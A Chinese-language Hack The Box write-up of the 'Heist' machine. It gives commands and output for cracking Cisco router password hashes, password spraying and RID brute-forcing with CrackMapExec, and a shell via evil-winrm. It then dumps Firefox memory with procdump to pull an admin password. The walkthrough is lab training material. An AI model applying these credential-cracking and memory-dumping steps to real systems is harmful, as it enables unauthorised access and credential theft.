前言

这是一篇writeup,靶机是来自hackthebox的heist

信息收集

使用nmap扫一下端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
$ nmap -p- -sV -sC -sS 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-11 09:53 EST
Nmap scan report for 10.10.10.149
Host is up (0.19s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 38s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-12-11T15:58:12
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3906.87 seconds

80 web服务 445 smb服务 5985 winrm 135/49968 rpc

Web

主机上开着Web服务,打开是一个登录页面。页面上有个以游客访问的功能,可以看到里面有人上传的一个配置文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0Â mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh

从配置文件中可以得到几个账号密码:

账号 密码 加密类型
??? $1$pdQG$o8nrSzsGXeaduXrjlvKc91 Type 5
rout3r 0242114B0E143F015F5D1E161713 Type 7
admin 02375012182C1A1D751618034F36415408 Type 7

结合网页描述来看这是一个思科路由器的配置文件,但是很明显都是以上经过加密的密码。查了一下Type 7是可以直接解密的,但是Type 5就没有那么容易了,只能爆破。

对于Type 7直接用在线的解密工具(当然这个网站可以解密Type 5的,但是耗时多),得到两个密码$uperP@sswordQ4)sJu\Y8qz*A3?d

对于Type 5的我就直接用john(相关文章)来解密了。

1
2
3
4
5
6
7
8
9
10
➜  heist  cat hash.txt
$1$pdQG$o8nrSzsGXeaduXrjlvKc91
➜ heist john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
No password hashes left to crack (see FAQ)
➜ heist john hash.txt --show
?:stealth1agent

得到一个密码:stealth1agent 。但对应的账号名是不清楚的,看了网上的文章都猜测是这个附件的上传者Hazard

Get Shell

我知道服务器上开了smb(445端口)和winrm(5985端口)两个服务,都可以远程连接。

尝试使用smb匿名登录

1
2
3
4
root@kali ~/Code/htb/heist # smbmap -H 10.10.10.149
[+] Finding open SMB ports....
root@kali ~/Code/htb/heist # smbclient -N -L 10.10.10.149
session setup failed: NT_STATUS_ACCESS_DENIED

没有权限。那只能用刚刚解密的账号密码试试了。使用CrackMapExec来进行爆破(成功了就会停止,可以使用--continue-on-success继续爆破):

1
2
3
4
5
6
7
8
9
heist # crackmapexec smb 10.10.10.149 -u users -p passwords
CME 10.10.10.149:445 SUPPORTDESK [*] Windows 10.0 Build 17763 (name:SUPPORTDESK) (domain:SUPPORTDESK)
CME 10.10.10.149:445 SUPPORTDESK [-] SUPPORTDESK\admin:stealth1agent STATUS_LOGON_FAILURE
CME 10.10.10.149:445 SUPPORTDESK [-] SUPPORTDESK\admin:$uperP@ssword STATUS_LOGON_FAILURE
CME 10.10.10.149:445 SUPPORTDESK [-] SUPPORTDESK\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
CME 10.10.10.149:445 SUPPORTDESK [-] SUPPORTDESK\rout3r:stealth1agent STATUS_LOGON_FAILURE
CME 10.10.10.149:445 SUPPORTDESK [-] SUPPORTDESK\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
CME 10.10.10.149:445 SUPPORTDESK [-] SUPPORTDESK\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
CME 10.10.10.149:445 SUPPORTDESK [+] SUPPORTDESK\hazard:stealth1agent

获得正确的账号密码:hazard/stealth1agent

但是同样的尝试登录winrm却不成功,说明这个账号没有登录winrm的权限,应该还有别的账号密码。

1
2
heist # crackmapexec winrm -u users -p passwords
[*] KTHXBYE!

使用smbmap用刚刚得到的账号密码进行登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
heist # smbmap -H 10.10.10.149 -u hazard -p stealth1agent
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.149...
[+] IP: 10.10.10.149:445 Name: 10.10.10.149
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
.
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 InitShutdown
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 lsass
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 ntsvcs
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 scerpc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-378-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 epmapper
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-1e8-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 LSM_API_service
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 eventlog
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-448-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 atsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-5ec-0
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 wkssvc
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 spoolss
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-a10-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 trkwks
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 W32TIME_ALT
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-288-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 vgauth-service
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 srvsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-278-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 ROUTER
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 gecko-crash-server-pipe.5428
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 chrome.5428.0.190032358
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 chrome.5428.1.96034004
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 chrome.5428.2.10178136
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 chrome.5428.3.201281206
.............(省略很多chrome)
IPC$ READ ONLY Remote IPC

可以发现权限很少,但其中有个IPC$有可读权限。IPC$(文档相关相关)是通过RPC实现的,文档说可以查看所有的共享文件、用户等等功能。事不宜迟,马上用RPC连接一波。

1
2
3
4
5
heist # rpcclient -U 'hazard%stealth1agent' 10.10.10.149
rpcclient $> lookupnames hazard
hazard S-1-5-21-4254423774-1266059056-3197185112-1008 (User: 1)
rpcclient $> lookupnames administrator
administrator S-1-5-21-4254423774-1266059056-3197185112-500 (User: 1)

一个用户有一个对应的SID,SID有几部分组成,对于一个计算机上的SID,不同用户只有最后一部分不一样,这一部分叫做RID,用来标志不同的用户(上面的命令返回也可以看到两个账号的sid只有最后不一样)。rpc命令中可以通过sid查询用户名,所以可以自己写个脚本遍历rid来获得账号。当然还可以用工具啦。还是使用刚刚的CrackMapExec,带上参数--rid-brute

1
2
3
4
5
6
7
8
9
10
11
12
13
(CrackMapExec) CrackMapExec[master] # cme smb 10.10.10.149 -u hazard -p stealth1agent --rid-brute
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [+] SUPPORTDESK\hazard:stealth1agent
SMB 10.10.10.149 445 SUPPORTDESK [+] Brute forcing RIDs
SMB 10.10.10.149 445 SUPPORTDESK 500: SUPPORTDESK\Administrator (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 501: SUPPORTDESK\Guest (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 513: SUPPORTDESK\None (SidTypeGroup)
SMB 10.10.10.149 445 SUPPORTDESK 1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 1009: SUPPORTDESK\support (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 1012: SUPPORTDESK\Chase (SidTypeUser)
SMB 10.10.10.149 445 SUPPORTDESK 1013: SUPPORTDESK\Jason (SidTypeUser)

得到三个新的用户supportChaseJason。再尝试登录一遍,可以得到正确的账号密码:chase / ‘Q4)sJu\Y8qz*A3?d

这时再用这个账号试试登录winrm。使用evil-winrm工具Get Shell。

1
2
3
4
5
6
7
8
9
10
11
# evil-winrm -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase
*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Chase\Desktop> cat user.txt
a127d***********

提权

翻看了一下服务器,种种迹象都指向这个firefox,而且进程中还有firefox。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
*Evil-WinRM* PS C:\Users\Chase\Desktop> cat todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.
*Evil-WinRM* PS C:\Users\Chase\Desktop> cd ..\appdata\roaming
*Evil-WinRM* PS C:\Users\Chase\appdata\roaming> ls


Directory: C:\Users\Chase\appdata\roaming


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/22/2019 7:14 AM Adobe
d---s- 4/22/2019 7:14 AM Microsoft
d----- 4/22/2019 8:01 AM Mozilla


*Evil-WinRM* PS C:\Users\Chase\appdata\roaming> ps

Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
458 18 2308 5504 408 0 csrss
296 17 2400 5292 492 1 csrss
358 15 3592 14644 5232 1 ctfmon
166 9 1896 9808 0.03 3308 1 dllhost
257 14 4120 13536 3928 0 dllhost
616 35 34804 60416 1012 1 dwm
1496 58 23944 78636 5620 1 explorer
1137 71 139216 178680 40.83 432 1 firefox
408 32 17008 62692 2.92 516 1 firefox
343 19 9976 37424 0.13 1700 1 firefox
390 33 54340 86268 104.78 4860 1 firefox
*********(省略)

我们知道80端口的Web服务需要登录,也许firefox内存的中藏有密码。

上传procdump工具到windows中,将firefox进程dump下来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
*Evil-WinRM* PS C:\Users\Chase\Desktop> upload procdump.exe 06.exe
[*] uploading : procdump.exe -> 06.exe
[*] Uploaded 467.19 KiB of 467.19 KiB (100.0%): procdump.exe -> 06.exe
[*] uploaded : procdump.exe -> 06.exe

*Evil-WinRM* PS C:\Users\Chase\Desktop>.\06.exe -ma 516 -accepteula

ProcDump v6.00 - Writes process dump files
Copyright (C) 2009-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards

Writing dump file C:\Users\Chase\Desktop\firefox_191106_223459.dmp ...
Writing 293MB. Estimated time (less than) 9 seconds.
Dump written.

meterpreter > download firefox_191106_223459.dmp ./
[*] Downloading: firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp
[*] Downloaded 1.00 MiB of 286.62 MiB (0.35%): firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp
[*] Downloaded 2.00 MiB of 286.62 MiB (0.7%): firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp
[*] Downloaded 3.00 MiB of 286.62 MiB (1.05%): firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp
[*] Downloaded 4.00 MiB of 286.62 MiB (1.4%): firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp
[*] Downloaded 5.00 MiB of 286.62 MiB (1.74%): firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp

下载到本地后搜索一下密码,字段就搜80端口的登录密码的字段就行:

1
2
3
4
5
kali at ~ ❯ strings firefox.exe_191214_145906.dmp | grep login_password
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

然后登录一下就完事了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
kali at ~ ❯ evil-winrm -i 10.10.10.149 -u administrator -p '4dD!5}x/re8]FBuZ'

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/22/2019 9:05 AM 32 root.txt